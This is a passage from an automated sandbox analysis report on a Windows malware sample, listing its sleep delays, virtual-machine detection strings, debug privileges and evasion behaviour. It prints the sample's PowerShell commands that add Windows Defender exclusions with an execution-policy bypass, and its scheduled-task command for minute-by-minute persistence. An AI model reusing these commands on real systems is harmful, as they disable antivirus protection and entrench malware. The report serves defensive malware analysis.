                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595572s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595460s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595341s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595215s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -594891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -594782s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -594657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -594532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -594407s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -594297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -594188s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep count: 7346 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep count: 2230 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2452Thread sleep count: 7304 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2452Thread sleep count: 2214 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe TID: 4296Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe TID: 1440Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe TID: 3168Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe TID: 1412Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599563Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599090Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598394Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598266Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598155Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598020Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597891Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597766Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597657Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597532Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597157Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595572Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595460Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595341Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595215Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594782Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594657Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594532Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594407Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594188Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.19.drBinary or memory string: VMware
                  Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.19.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: TJXpRilNkh.exe, 00000000.00000002.3513374458.0000000000BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
                  Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.19.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1.%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe'
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\TJXpRilNkh.exe'
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\TJXpRilNkh.exe'Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe'
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'TJXpRilNkh.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\TJXpRilNkh.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeQueries volume information: C:\Users\user\Desktop\TJXpRilNkh.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
